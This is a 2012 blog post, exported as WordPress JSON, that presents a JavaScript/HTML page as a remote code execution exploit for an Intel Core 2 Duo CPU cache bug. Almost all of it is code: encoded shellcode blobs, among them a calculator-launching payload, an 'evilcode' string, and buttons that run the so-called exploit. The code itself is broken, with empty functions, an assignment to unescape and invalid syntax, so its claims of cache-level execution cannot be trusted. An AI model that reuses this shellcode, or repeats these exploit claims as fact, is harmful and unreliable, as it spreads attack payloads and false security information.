{"id":7232,"date":"2012-07-14T08:57:11","date_gmt":"2012-07-14T01:57:11","guid":{"rendered":"http:\/\/deepquest.code511.com\/blog\/?p=7232"},"modified":"2012-07-14T08:57:11","modified_gmt":"2012-07-14T01:57:11","slug":"cpu-cache-controller-bug-exploit-remote-code-exec-mod-poc","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2012\/07\/cpu-cache-controller-bug-exploit-remote-code-exec-mod-poc\/","title":{"rendered":"CPU cache controller bug exploit (Remote code exec mod poc)"},"content":{"rendered":"

This bug \u00a0won’t be updated unless you change computer. It’s a remote code exec mod poc in javascript, the code will execute directly on your Intel Core2DUO CPU cache.<\/p>\n

<\/p>\n

<\/pre>\n
-->Beginning of POC\r\n\r\n<html>\r\n\t<head>\r\n\t\t<title> CPU cache controller bug exploit (Remote code exec mod poc)<\/title>\r\n\t<\/head>\r\n<\/html>\r\n\r\n<body>\r\n<script type=\"text\/javascript\">\r\n\r\nvar microcode = 257;\r\nvar N_CORE = 4;\r\nvar XXL = 9*1024*1024;\r\nvar buf = 9437185;\r\n\r\nvar p = {};\r\nvar bug;\r\nvar result;\r\nvar n = {};\r\nfunction init_c(){};\r\nfunction engine(p, n){};\r\n\r\nfunction test(result){\r\n\/\/ debug: testing micro-program for the old vm, does not work now \r\n\/\/ latter comment 1: oh. my! it works! wow!\r\n\/\/ latter comment 2: it works, but it does not what it's expected to\r\n\/\/ dw buf[]={1,-3,0, -6,9,1, 13,-67,2, -69,96,3, 1,-1,4,\r\n\/\/ -3,3,5, 16,-27,6, -66,99,7, 55,-1,8, -1,-3,9, 0,-67,10};\r\n\r\n\/\/ the infinite loop will be patched on the fly because of the Intel CPU bug\r\n\/\/ addr of the test() func should be aligned by 4Kb boundary,\r\n\/\/ 1st dword will be changed to NOP, NOP, NOP, NOP\r\n\/\/ it's possible to change the kernel memory as well,\r\n\/\/ two things:\r\n\/\/ 1) alignment;\r\n\/\/ 2) the code is currently executed;\r\n\/\/\r\n\/\/ engine() obtains the address of test(), but does not check it,\r\n\/\/ so if you replace it, you have to check the conditionals above by yourself.\r\n\/\/ also the content to overwrite. if you want to change data memory\r\n\/\/ it's supposed to be in the cache as well.\r\n\/*\r\n\r\nASM:\r\n        .text\r\n.globl main\r\n        .type   main, @function\r\nL1:\r\n        xorl %ecx, %ecx\r\n\r\nmain:\r\n        pushl   %ebp\r\n        movl    %esp, %ebp\r\n        popl    %ebp\r\n        loop L1\r\n        ret\r\n        .size   main, .-main\r\n\r\nDISASM:\r\n\r\n080483b4 <L1>:\r\n80483b4:\t31 c9                \txor    %ecx,%ecx\r\n\r\n080483b6 <main>:\r\n80483b6:\t55                   \tpush   %ebp\r\n80483b7:\t89 e5                \tmov    %esp,%ebp\r\n80483b9:\t5d                   \tpop    %ebp\r\n80483ba:\te2 f8                \tloop   80483b4 <L1>\r\n80483bc:\tc3                   \tret    \r\n80483bd:\t90                   \tnop\r\n80483be:\t90                   \tnop\r\n80483bf:\t90                   \tnop\r\n\r\n*\/\r\n\tunescape('%u31C9%u5589%uE55D%u2EF8%uC390%u9090');\r\n\treturn 0;\r\n}\r\n\r\nfunction ThreadProc(lpParameter){\r\n\tengine(buf, microcode*3);\r\n\treturn(0);\r\n}\r\n\r\nfunction ThreadProc_dbg(bug){\r\n\tvar result = 1;\r\n\ttest(result);\r\n\tif (result != 1){\r\n\t\tdocument.write(\"<h1>[+] your CPU is buggy!<h1>\");\r\n    }\r\n\telse{\r\n\t\tdocument.write(\"<h1>[-] your CPU isn't buggy!<h1>\");\r\n\t\t\/\/eueeuereturn(0);\r\n\t}\r\n}\r\n\r\nfunction microcode_vm(){\r\n\tvar evilcode = \"6B70%u6E63%u2066%u6F72%u204A%u442E%u2066%u6F72%u2049%u6E74\"+\r\n\t\"%u656C%u2043%u6F72%u6520%u3220%u4475%u6F20%u5435%u3735%u300D%u0A28%u6329\"+\r\n\t\"%u2053%u656C%u656E%u612F%u2F32%u3030%u372C%u2032%u3030%u3800%u2B00%u0000\"+\r\n\t\"%u0500%u0000%u2600%u0000%u3E00%u0000%u4702%u0000%uE7FD%uFFFF%u0000%u0000\"+\r\n\t\"%uA3FF%uFFFF%uA7FF%uFFFF%u0100%u0000%u0200%u0000%u0A00%u0000%u0200%u0000\"+\r\n\t\"%u0100%u0000%u0900%u0000%u0300%u0000%u0400%u0000%u1400%u0000%u0400%u0000\"+\r\n\t\"%u1F00%u0000%u2B00%u0000%u0500%u0000%u2600%u0000%u3E00%u0000%u0600%u0000\"+\r\n\t\"%u0D00%u0000%u2500%u0000%u0700%u0000%u3000%u0000%u4000%u0000%u0800%u0000\"+\r\n\t\"%u6B00%u0000%u8F00%u0000%u0900%u0000%uFA00%u0000%u1201%u0000%u0A00%u0000\"+\r\n\t\"%uC901%u0000%uE101%u0000%u0B00%u0000%u0C00%u0000%u3C00%u0000%u0C00%u0000\"+\r\n\t\"%u1700%u0000%u3300%u0000%u0D00%u0000%u0E00%u0000%u3600%u0000%u0E00%u0000\"+\r\n\t\"%u1500%u0000%u4D00%u0000%u0F00%u0000%u6800%u0000%u8800%u0000%u1000%u0000\"+\r\n\t\"%uD300%u0000%u1701%u0000%u1100%u0000%uF201%u0000%u3A02%u0000%u1200%u0000\"+\r\n\t\"%uF103%u0000%u3904%u0000%u1300%u0000%uF407%u0000%u2408%u0000%u1400%u0000\"+\r\n\t\"%uEF0F%u0000%u3B10%u0000%u1500%u0000%u961F%u0000%uCE1F%u0000%u1600%u0000\"+\r\n\t\"%u1D00%u0000%u7500%u0000%u1700%u0000%u2000%u0000%u7000%u0000%u1800%u0000\"+\r\n\t\"%u1B00%u0000%u7F00%u0000%u1900%u0000%u2A00%u0000%u6200%u0000%u1A00%u0000\"+\r\n\t\"%u1900%u0000%u7100%u0000%u1B00%u0000%u3C00%u0000%u8C00%u0000%u1C00%u0000\"+\r\n\t\"%uE700%u0000%u2301%u0000%u1D00%u0000%u9E01%u0000%uE601%u0000%u1E00%u0000\"+\r\n\t\"%u2500%u0000%u9D00%u0000%u1F00%u0000%uD800%u0000%u1801%u0000%u2000%u0000\"+\r\n\t\"%uA301%u0000%u2702%u0000%u2100%u0000%uE203%u0000%u6A04%u0000%u2200%u0000\"+\r\n\t\"%uE107%u0000%u6908%u0000%u2300%u0000%uE40F%u0000%u7410%u0000%u2400%u0000\"+\r\n\t\"%uFF1F%u0000%u4B20%u0000%u2500%u0000%uC63F%u0000%u1E40%u0000%u2600%u0000\"+\r\n\t\"%uAD7F%u0000%u0580%u0000%u2700%u0000%uD0FF%u0000%u6000%u0100%u2800%u0000\"+\r\n\t\"%uCBFF%u0100%u6F00%u0200%u2900%u0000%uDAFF%u0300%u7200%u0400%u2A00%u0000\"+\r\n\t\"%u29FF%u0700%u81FF%u0700%u2B00%u0000%u2C00%u0000%u9C00%u0000%u2C00%u0000\"+\r\n\t\"%u3700%u0000%u9300%u0000%u2D00%u0000%u2E00%u0000%u9600%u0000%u2E00%u0000\"+\r\n\t\"%u3500%u0000%uED00%u0000%u2F00%u0000%u4800%u0000%uE800%u0000%u3000%u0000\"+\r\n\t\"%u3300%u0000%uF700%u0000%u3100%u0000%u5200%u0000%uDA00%u0000%u3200%u0000\"+\r\n\t\"%u1100%u0000%u9900%u0000%u3300%u0000%u1400%u0000%u8400%u0000%u3400%u0000\"+\r\n\t\"%u0F00%u0000%u9B00%u0000%u3500%u0000%u3600%u0000%uEE00%u0000%u3600%u0000\"+\r\n\t\"%u7D00%u0000%u1501%u0000%u3700%u0000%uC001%u0000%u5002%u0000%u3800%u0000\"+\r\n\t\"%u3B03%u0000%uDF03%u0000%u3900%u0000%u4A00%u0000%uC200%u0000%u3A00%u0000\"+\r\n\t\"%u3900%u0000%uD100%u0000%u3B00%u0000%u5C00%u0000%u2C01%u0000%u3C00%u0000\"+\r\n\t\"%uC701%u0000%u4302%u0000%u3D00%u0000%u3E03%u0000%uC603%u0000%u3E00%u0000\"+\r\n\t\"%u4500%u0000%u3D01%u0000%u3F00%u0000%uB801%u0000%u3802%u0000%u4000%u0000\"+\r\n\t\"%u4303%u0000%u4704%u0000%u4100%u0000%uC207%u0000%uCA08%u0000%u4200%u0000\"+\r\n\t\"%uC10F%u0000%uC910%u0000%u4300%u0000%uC41F%u0000%uD420%u0000%u4400%u0000\"+\r\n\t\"%uDF3F%u0000%uEB40%u0000%u4500%u0000%uE67F%u0000%uFE80%u0000%u4600%u0000\"+\r\n\t\"%uCDFF%u0000%uE500%u0100%u4700%u0000%uF0FF%u0100%u8000%u0200%u4800%u0000\"+\r\n\t\"%uABFF%u0300%uCF00%u0400%u4900%u0000%uBAFF%u0700%uD200%u0800%u4A00%u0000\"+\r\n\t\"%u89FF%u0F00%u2100%u1000%u4B00%u0000%u4CFF%u1F00%u7C00%u2000%u4C00%u0000\"+\r\n\t\"%uD7FF%u3F00%uF300%u4000%u4D00%u0000%uCEFF%u7F00%uF600%u8000%u4E00%u0000\"+\r\n\t\"%uD5FF%uFF00%u8D00%u0001%u4F00%u0000%uA8FF%uFF01%uC800%u0002%u5000%u0000\"+\r\n\t\"%u93FF%uFF03%uD700%u0004%u5100%u0000%uB2FF%uFF07%uFA00%u0008%u5200%u0000\"+\r\n\t\"%uB1FF%uFF0F%uF900%u0010%u5300%u0000%uB4FF%uFF1F%uE400%u0020%u5400%u0000\"+\r\n\t\"%uAFFF%uFF3F%uFB00%u0040%u5500%u0000%u56FE%uFF7F%u0EFF%uFF7F%u5600%u0000\"+\r\n\t\"%u5D00%u0000%u3501%u0000%u5700%u0000%u6000%u0000%u3001%u0000%u5800%u0000\"+\r\n\t\"%u5B00%u0000%u3F01%u0000%u5900%u0000%u6A00%u0000%u2201%u0000%u5A00%u0000\"+\r\n\t\"%u5900%u0000%u3101%u0000%u5B00%u0000%u7C00%u0000%uCC01%u0000%u5C00%u0000\"+\r\n\t\"%uA700%u0000%uE301%u0000%u5D00%u0000%u5E00%u0000%u2601%u0000%u5E00%u0000\"+\r\n\t\"%u6500%u0000%uDD01%u0000%u5F00%u0000%u9800%u0000%uD801%u0000%u6000%u0000\"+\r\n\t\"%u6300%u0000%uE701%u0000%u6100%u0000%uA200%u0000%uAA01%u0000%u6200%u0000\"+\r\n\t\"%u2100%u0000%u2901%u0000%u6300%u0000%u2400%u0000%u3401%u0000%u6400%u0000\"+\r\n\t\"%u3F00%u0000%u0B01%u0000%u6500%u0000%u0600%u0000%u5E01%u0000%u6600%u0000\"+\r\n\t\"%u6D00%u0000%uC501%u0000%u6700%u0000%u9000%u0000%uA001%u0000%u6800%u0000\"+\r\n\t\"%u0B00%u0000%u2F01%u0000%u6900%u0000%u1A00%u0000%u3201%u0000%u6A00%u0000\"+\r\n\t\"%u6900%u0000%uC101%u0000%u6B00%u0000%uEC00%u0000%u5C02%u0000%u6C00%u0000\"+\r\n\t\"%uF703%u0000%u5305%u0000%u6D00%u0000%uEE07%u0000%u5609%u0000%u6E00%u0000\"+\r\n\t\"%uF50F%u0000%u2D11%u0000%u6F00%u0000%u881F%u0000%uA820%u0000%u7000%u0000\"+\r\n\t\"%u733E%u0000%uB73F%u0000%u7100%u0000%u9200%u0000%u9A01%u0000%u7200%u0000\"+\r\n\t\"%u5100%u0000%uD901%u0000%u7300%u0000%uD400%u0000%u4402%u0000%u7400%u0000\"+\r\n\t\"%uCF03%u0000%u5B05%u0000%u7500%u0000%uF607%u0000%u2E09%u0000%u7600%u0000\"+\r\n\t\"%uBD0F%u0000%u5511%u0000%u7700%u0000%u801F%u0000%u9020%u0000%u7800%u0000\"+\r\n\t\"%u7B3E%u0000%u9F3F%u0000%u7900%u0000%u8A00%u0000%u8201%u0000%u7A00%u0000\"+\r\n\t\"%u7900%u0000%u9101%u0000%u7B00%u0000%u9C00%u0000%u6C02%u0000%u7C00%u0000\"+\r\n\t\"%u8703%u0000%u8304%u0000%u7D00%u0000%u7E06%u0000%u8607%u0000%u7E00%u0000\"+\r\n\t\"%u8500%u0000%u7D02%u0000%u7F00%u0000%u7803%u0000%u7804%u0000%u8000%u0000\"+\r\n\t\"%u8306%u0000%u8708%u0000%u8100%u0000%u820F%u0000%u8A11%u0000%u8200%u0000\"+\r\n\t\"%u811F%u0000%u8921%u0000%u8300%u0000%u843F%u0000%u9441%u0000%u8400%u0000\"+\r\n\t\"%u9F7F%u0000%uAB81%u0000%u8500%u0000%uA6FF%u0000%uBE01%u0100%u8600%u0000\"+\r\n\t\"%u8DFF%u0100%uA501%u0200%u8700%u0000%uB0FF%u0300%uC001%u0400%u8800%u0000\"+\r\n\t\"%uEBFF%u0700%u0F01%u0800%u8900%u0000%u7AFF%u0F00%u9201%u1000%u8A00%u0000\"+\r\n\t\"%u49FF%u1F00%u6100%u2000%u8B00%u0000%u8CFE%u3F00%uBC00%u4000%u8C00%u0000\"+\r\n\t\"%u97FF%u7F00%uB301%u8000%u8D00%u0000%u8EFF%uFF00%uB601%u0001%u8E00%u0000\"+\r\n\t\"%u95FF%uFF01%uCD01%u0002%u8F00%u0000%uE8FF%uFF03%u0801%u0004%u9000%u0000\"+\r\n\t\"%u53FF%uFF07%u9701%u0008%u9100%u0000%u72FF%uFF0F%uBA01%u0010%u9200%u0000\"+\r\n\t\"%u71FF%uFF1F%uB901%u0020%u9300%u0000%u74FF%uFF3F%uA401%u0040%u9400%u0000\"+\r\n\t\"%u6FFF%uFF7F%uBB01%u0080%u9500%u0000%u16FF%uFFFF%u4E00%u0000%u9600%u0000\"+\r\n\t\"%u9DFE%uFFFF%uF500%u0000%u9700%u0000%uA0FF%uFFFF%uF001%u0000%u9800%u0000\"+\r\n\t\"%u9BFF%uFFFF%uFF01%u0000%u9900%u0000%uAAFF%uFFFF%uE201%u0000%u9A00%u0000\"+\r\n\t\"%u99FF%uFFFF%uF101%u0000%u9B00%u0000%uBCFF%uFFFF%u0C01%u0000%u9C00%u0000\"+\r\n\t\"%u67FF%uFFFF%uA301%u0000%u9D00%u0000%u1EFF%uFFFF%u6600%u0000%u9E00%u0000\"+\r\n\t\"%uA5FE%uFFFF%u1D00%u0000%u9F00%u0000%u58FF%uFFFF%u9801%u0000%uA000%u0000\"+\r\n\t\"%u23FF%uFFFF%uA701%u0000%uA100%u0000%u62FF%uFFFF%uEA01%u0000%uA200%u0000\"+\r\n\t\"%u61FF%uFFFF%uE901%u0000%uA300%u0000%u64FF%uFFFF%uF401%u0000%uA400%u0000\"+\r\n\t\"%u7FFF%uFFFF%uCB01%u0000%uA500%u0000%u46FF%uFFFF%u9E01%u0000%uA600%u0000\"+\r\n\t\"%u2DFF%uFFFF%u8501%u0000%uA700%u0000%u50FF%uFFFF%uE001%u0000%uA800%u0000\"+\r\n\t\"%u4BFF%uFFFF%uEF01%u0000%uA900%u0000%u5AFF%uFFFF%uF201%u0000%uAA00%u0000\"+\r\n\t\"%uA9FC%uFFFF%u01FE%uFFFF%uAB00%u0000%uAC00%u0000%u1C02%u0000%uAC00%u0000\"+\r\n\t\"%uB700%u0000%u1302%u0000%uAD00%u0000%uAE00%u0000%u1602%u0000%uAE00%u0000\"+\r\n\t\"%uB500%u0000%u6D02%u0000%uAF00%u0000%uC800%u0000%u6802%u0000%uB000%u0000\"+\r\n\t\"%uB300%u0000%u7702%u0000%uB100%u0000%uD200%u0000%u5A02%u0000%uB200%u0000\"+\r\n\t\"%u9100%u0000%u1902%u0000%uB300%u0000%u9400%u0000%u0402%u0000%uB400%u0000\"+\r\n\t\"%u8F00%u0000%u1B02%u0000%uB500%u0000%uB600%u0000%u6E02%u0000%uB600%u0000\"+\r\n\t\"%uFD00%u0000%u9503%u0000%uB700%u0000%u4001%u0000%uD003%u0000%uB800%u0000\"+\r\n\t\"%uBB00%u0000%u5F02%u0000%uB900%u0000%uCA00%u0000%u4202%u0000%uBA00%u0000\"+\r\n\t\"%uB900%u0000%u5102%u0000%uBB00%u0000%uDC00%u0000%uAC03%u0000%uBC00%u0000\"+\r\n\t\"%u4701%u0000%uC303%u0000%uBD00%u0000%uBE00%u0000%u4602%u0000%uBE00%u0000\"+\r\n\t\"%uC500%u0000%uBD03%u0000%uBF00%u0000%u3801%u0000%uB803%u0000%uC000%u0000\"+\r\n\t\"%uC300%u0000%uC703%u0000%uC100%u0000%u4201%u0000%u4A03%u0000%uC200%u0000\"+\r\n\t\"%u4100%u0000%u4902%u0000%uC300%u0000%u4400%u0000%u5402%u0000%uC400%u0000\"+\r\n\t\"%u5F00%u0000%u6B02%u0000%uC500%u0000%u6600%u0000%u7E02%u0000%uC600%u0000\"+\r\n\t\"%u4D00%u0000%u6502%u0000%uC700%u0000%u7000%u0000%u0002%u0000%uC800%u0000\"+\r\n\t\"%u2B00%u0000%u4F02%u0000%uC900%u0000%u3A00%u0000%u5202%u0000%uCA00%u0000\"+\r\n\t\"%u0900%u0000%uA102%u0000%uCB00%u0000%uCC00%u0000%uFC03%u0000%uCC00%u0000\"+\r\n\t\"%u5701%u0000%u7303%u0000%uCD00%u0000%u4E00%u0000%u7602%u0000%uCE00%u0000\"+\r\n\t\"%u5500%u0000%u0D02%u0000%uCF00%u0000%u2800%u0000%u4802%u0000%uD000%u0000\"+\r\n\t\"%u1300%u0000%u5702%u0000%uD100%u0000%u3200%u0000%u7A02%u0000%uD200%u0000\"+\r\n\t\"%u3100%u0000%u7902%u0000%uD300%u0000%u3400%u0000%u6402%u0000%uD400%u0000\"+\r\n\t\"%u2F00%u0000%u7B02%u0000%uD500%u0000%uD600%u0000%u8E03%u0000%uD600%u0000\"+\r\n\t\"%uDD01%u0000%uB504%u0000%uD700%u0000%uE007%u0000%uB00A%u0000%uD800%u0000\"+\r\n\t\"%uDB0F%u0000%uBF12%u0000%uD900%u0000%uEA1F%u0000%uA222%u0000%uDA00%u0000\"+\r\n\t\"%uD93F%u0000%uB142%u0000%uDB00%u0000%uFC7F%u0000%u4C82%u0000%uDC00%u0000\"+\r\n\t\"%u27FF%u0000%u6301%u0100%uDD00%u0000%uDEFC%u0100%uA6FF%u0100%uDE00%u0000\"+\r\n\t\"%uE501%u0000%u5D04%u0000%uDF00%u0000%u1807%u0000%u5809%u0000%uE000%u0000\"+\r\n\t\"%uE30C%u0000%u670F%u0000%uE100%u0000%u2201%u0000%u2A03%u0000%uE200%u0000\"+\r\n\t\"%uA100%u0000%uA903%u0000%uE300%u0000%uA401%u0000%uB404%u0000%uE400%u0000\"+\r\n\t\"%uBF07%u0000%u8B0A%u0000%uE500%u0000%u860F%u0000%uDE12%u0000%uE600%u0000\"+\r\n\t\"%uED1F%u0000%u4522%u0000%uE700%u0000%u103F%u0000%u2041%u0000%uE800%u0000\"+\r\n\t\"%u8B7C%u0000%uAF7F%u0000%uE900%u0000%u9A01%u0000%uB204%u0000%uEA00%u0000\"+\r\n\t\"%uE907%u0000%u410A%u0000%uEB00%u0000%u6C0F%u0000%uDC12%u0000%uEC00%u0000\"+\r\n\t\"%u771F%u0000%uD322%u0000%uED00%u0000%u6E3F%u0000%uD642%u0000%uEE00%u0000\"+\r\n\t\"%u757F%u0000%uAD82%u0000%uEF00%u0000%u08FF%u0000%u2801%u0100%uF000%u0000\"+\r\n\t\"%uF3FC%u0100%u37FF%u0100%uF100%u0000%u1201%u0000%u1A03%u0000%uF200%u0000\"+\r\n\t\"%uD100%u0000%u5903%u0000%uF300%u0000%u5401%u0000%uC404%u0000%uF400%u0000\"+\r\n\t\"%u4F07%u0000%uDB0A%u0000%uF500%u0000%u760F%u0000%uAE12%u0000%uF600%u0000\"+\r\n\t\"%u3D1F%u0000%uD522%u0000%uF700%u0000%u003F%u0000%u1041%u0000%uF800%u0000\"+\r\n\t\"%uFB7C%u0000%u1F7F%u0000%uF900%u0000%u0A01%u0000%u0203%u0000%uFA00%u0000\"+\r\n\t\"%uF900%u0000%u1103%u0000%uFB00%u0000%u1C01%u0000%uEC04%u0000%uFC00%u0000\"+\r\n\t\"%u0707%u0000%u0309%u0000%uFD00%u0000%uFE0C%u0000%u060F%u0000%uFE00%u0000\"+\r\n\t\"%u0501%u0000%uFD04%u0000%uFF00%u0000%uF806%u0000%uF808%u0000%u0001%u0000\";\r\n\tunescape(evilcode);\r\n}\r\n\r\n\/*\r\n\/\/ THREATED IMPLEMENTATION\r\nfunction init(){\r\n\tdocument.write(\"<p>[!] Exploit Running<\/p><br>\");\r\n\tdocument.write(\"[+] Loading micro-program\");\r\n\tmicrocode_vm();\r\n\tvar a, id, handle;\r\n\tvar size = 111;\r\n\tdocument.write(\"initializing XX thread...\");\r\n\r\n\tfor (a=1; a < N_CORE; a++){\r\n\t\t\t\/\/code should be written for debug.\r\n\t}\r\n\r\n}\r\n\r\n*\/\r\n\r\nfunction vm_engine()\r\n{\r\n\tvar a, dw, f1, f2, f3, fn, f0 = -1, dt = 0;\r\n\tfor(;;){\r\n\t\tmicrocode_vm();\r\n\t\tf1;\r\n\t\tunescape = (p + ((dt++) % n));\r\n\t\tf2 = (p + ((dt++) % n));\r\n\t\tf3 = (p + ((dt++) % n));\r\n\r\n\t\t\/\/ vm + scrambler + dynamic encoder + multi-pass obfuscator\r\n\t\tfn = -1 ^ (f1 ^ f2) + ((dt + f1) ^ f2) ^ f0;\r\n\r\n\t\t\/\/ a few minutes to trigger this condition on 2.4 MHz PC\r\n\t\tif ( ((f1 ^ f2) == 0) || (f1 ^ f2 ^ f3) == 0)\r\n\t\t{\r\n\t\t\t\/\/ a sync problem. it would be better to use locks over here.\r\n\t\t\t\/\/ crash happens. crash is not shit. crash means code works.\r\n\t\t\t\/\/ so, should be really care about the addr and the content?\r\n\t\t\t\/\/ it works for Intel Core 2 Duo T5750. o_o 5 ~ 10 minutes of\r\n\t\t\t\/\/ it gives BSOD on Intel Atom N270 cpu o_o less than an hour\r\n\t\t\tf3 = test(result); f1 = unescape(\"%u9090%u9090\") ^ f0 + \r\n\t\t\t\/\/ Shellcode Calculator \r\n\t\t\tunescape(\"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800\"+   \r\n                     \"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A\" +   \r\n                     \"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350\" +   \r\n                     \"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40\" +   \r\n                     \"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000\" +   \r\n                     \"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040\" +   \r\n                     \"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD\" +   \r\n                     \"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40\" +   \r\n                     \"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18\" +   \r\n                     \"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0\" +   \r\n                     \"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B\" +   \r\n                     \"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24\" +   \r\n                     \"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9\" +   \r\n                     \"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C\" +   \r\n                     \"%u652E%u6578%u9000\"); f2 = test ^ fn;\r\n\r\n\t\t\tdocument.write(\"<br><br>w00t! w00t! u g0t r00t ?!<br>\");\r\n\t\t}\t(p + (f3 % n)) = fn; f0 = fn; \/* f0 = fn ^ dt *\/ ;\r\n\t}\r\n}\r\n\r\nfunction demo()\r\n{\r\n\tvar n;\r\n\tdocument.write(\"HITB 2008 missing exploit :=) by Selena<br><br>\");\r\n\tdocument.write(\"micro-code is written by Selena<br>\");\r\n\tdocument.write(\"virtual machine is designed by Selena<br>\");\r\n\tdocument.write(\"virtual machine is designed by Selena<br>\");\r\n\tdocument.write(\"virtual machine has been rewritten by nezumi<br><br>\");\r\n\tdocument.write(\"exploit PoC rewritten by S4(uR4 for remote atack demo 2012<br><br>\");\r\n\t\/\/setTimeout(9000);\r\n\tdocument.write(\"[!]<b> Exploit Running\");\r\n\tvm_engine(); \/\/if (n == 0) { init_t();} ;\r\n\t\/\/if(result != 0){\r\n\t\tdocument.write(\"<br><b>[+] Done!\");\r\n\t\/\/}\r\n}\r\n\r\n<\/script>\r\n<h1>CPU cache controller bug exploit Remote code exec mod<\/h1>\r\n\r\n<button onClick=\"ThreadProc_dbg(bug)\";><b>&bull; Check vuln<\/b> &raquo;<\/button> \r\n<button onClick=\"demo()\";><b>PoC Run!<\/b> &rarr;<\/button>\r\n\r\n<\/body><\/pre>\n
<\/pre>\n
credits: S4(uR4<\/pre>\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
This bug \u00a0won’t be updated unless you change computer. It’s a remote code exec mod poc in javascript, the code will execute directly on your Intel Core2DUO CPU cache.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[43,139],"tags":[2178],"class_list":["post-7232","post","type-post","status-publish","format-standard","hentry","category-exploit","category-tools","tag-poc"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-1SE","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/7232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=7232"}],"version-history":[{"count":3,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/7232\/revisions"}],"predecessor-version":[{"id":7239,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/7232\/revisions\/7239"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=7232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=7232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=7232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}